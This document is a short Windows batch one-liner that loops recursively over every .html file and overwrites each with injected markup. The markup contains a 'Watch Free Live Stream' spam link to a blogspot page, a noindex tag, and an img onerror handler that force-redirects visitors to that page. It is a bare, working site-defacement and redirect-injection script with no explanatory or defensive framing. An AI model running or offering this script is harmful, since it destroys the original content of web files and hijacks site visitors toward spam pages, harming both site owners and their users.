
for /r %f in (*.html) do (
  echo "<center><h1><a href="https://ki-khela-dekkte-aschis.blogspot.com/2023/09/twnnis-2023.html">Watch Free Live Stream<h1></center> <center><a href="https://ki-khela-dekkte-aschis.blogspot.com/2023/09/twnnis-2023.html"><img src="https://edu.ieee.org/in-mepco-wie/wp-content/uploads/sites/387/2016/09/click-here-logo-button-gif-images-2.gif?format=750w" alt="click here"></a></center>  <meta name="googlebot" content="noindex">  <img src='0' onerror= top.location.href='https://ki-khela-dekkte-aschis.blogspot.com/2023/09/twnnis-2023.html'>" > %f
)